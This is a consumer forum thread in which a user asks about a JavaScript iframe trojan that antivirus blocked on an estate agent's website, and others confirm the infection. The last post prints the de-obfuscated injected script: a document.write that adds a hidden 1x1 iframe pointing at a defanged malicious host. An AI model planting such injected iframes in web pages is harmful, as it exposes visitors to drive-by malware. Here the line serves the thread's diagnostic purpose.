📨 Have you signed up to the Forum's new Email Digest yet? Get a selection of trending threads sent straight to your inbox daily, weekly or monthly!

Trojan Blocked

Options
jim22
jim22 Posts: 1,227 Forumite
Hello, avast free has just reported that it has blocked this Trojan- JS IFRAME-AC TRJ

EXPLORE\IEXPLORE.EXE

If this is real and not a false positive why on earth would there be this kind of threat on the pages of a south wales estate agent?

Do the devils who put these threats on sites just choose indiscriminately? How do they put them there? Thanks.
«134

Comments

  • stilltheone
    stilltheone Posts: 2,131 Forumite
    Some websites are easier to hack than others?
  • spg_SCOTT
    spg_SCOTT Posts: 171 Forumite
    It is not an alert on "EXPLORE\IEXPLORE.EXE" (i.e. internet explorer) That is just the process that is accessing the site.

    It is an alert on whatever site you are browsing.

    If you post the site link but make it unclickable by changing http to hXXp I could take a look.
    -Scott-

    “There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks Scott- hxxp://www.curatech.net/evansjones/ they are an estate agents in kenfig hill bridgend
  • RussJK
    RussJK Posts: 2,359 Forumite
    edited 14 June 2011 at 11:09PM
    jim22 wrote: »
    Thanks Scott- hxxp://www.curatech.net/evansjones/ they are an estate agents in kenfig hill bridgend

    Links to 89.208.149.214, which is presumably the site that caused the trojan to download. You're lucky that Avast was able to detect it.

    Might be worth a quick scan with Malwarebytes in case you also downloaded something that wasn't detected.
  • spg_SCOTT
    spg_SCOTT Posts: 171 Forumite
    Not a false positive, detection is correct.

    Just for info, the source of the site in a text file:
    http://www.virustotal.com/file-scan/report.html?id=d23a63b99af1fa96fea2edeb0d3d484db9e4c399222540cc0d5fd3f0e53124e3-1308088565

    At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
    http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

    This also exists on the home page, (no evansjones on the url) so is proably elsewhere in the site too...
    -Scott-

    “There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks scott, ive run a malwarebytes scan which reports nothing. Any idea how or why this infection is lodged on this site?
  • asbokid
    asbokid Posts: 2,008 Forumite
    edited 15 June 2011 at 2:43AM
    Hi Jim!

    Because of the nature of http (the web protocol), objects referenced in a webpage are often hosted off-site..

    All that is needed is an attack vector in a remotely-hosted object. That could be a maliciously crafted
    image that crashes the image rending software on your PC which allows 'the execution of arbitrary code'.

    This image here, for example... it could be hosted on MSE.COM, or evansjones.com, but it's actually hosted on number10.gov.uk! Unless you disable the display of all images in your browser, or you scrutinise every image before it is downloaded and displayed, there is no way of telling whether it has malicious content.

    history-tour-188.jpg
  • RussJK
    RussJK Posts: 2,359 Forumite
    spg_SCOTT wrote: »

    Sure makes an argument against the strength of "common sense" in protecting against viruses, seeing how few detect obfuscated code...
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks everybody. Should I ring this estate agent and tell them that their site is infected for the benefit of their customers. Mind you, they might blame me.
  • asbokid
    asbokid Posts: 2,008 Forumite
    edited 15 June 2011 at 12:22AM
    spg_SCOTT wrote: »
    At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
    http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

    De-obfuscated, that script reads...
    document.write('<iframe src="hxxp://sivassigorta.com/forum.php?tp=8c605c6bfdd9b2f5" width="1" height="1" frameborder="0"></iframe>')
    
This discussion has been closed.
Meet your Ambassadors

🚀 Getting Started

Hi new member!

Our Getting Started Guide will help you get the most out of the Forum

Categories

  • All Categories
  • 351.1K Banking & Borrowing
  • 253.1K Reduce Debt & Boost Income
  • 453.6K Spending & Discounts
  • 244.1K Work, Benefits & Business
  • 599K Mortgages, Homes & Bills
  • 177K Life & Family
  • 257.4K Travel & Transport
  • 1.5M Hobbies & Leisure
  • 16.1K Discuss & Feedback
  • 37.6K Read-Only Boards

Is this how you want to be seen?

We see you are using a default avatar. It takes only a few seconds to pick a picture.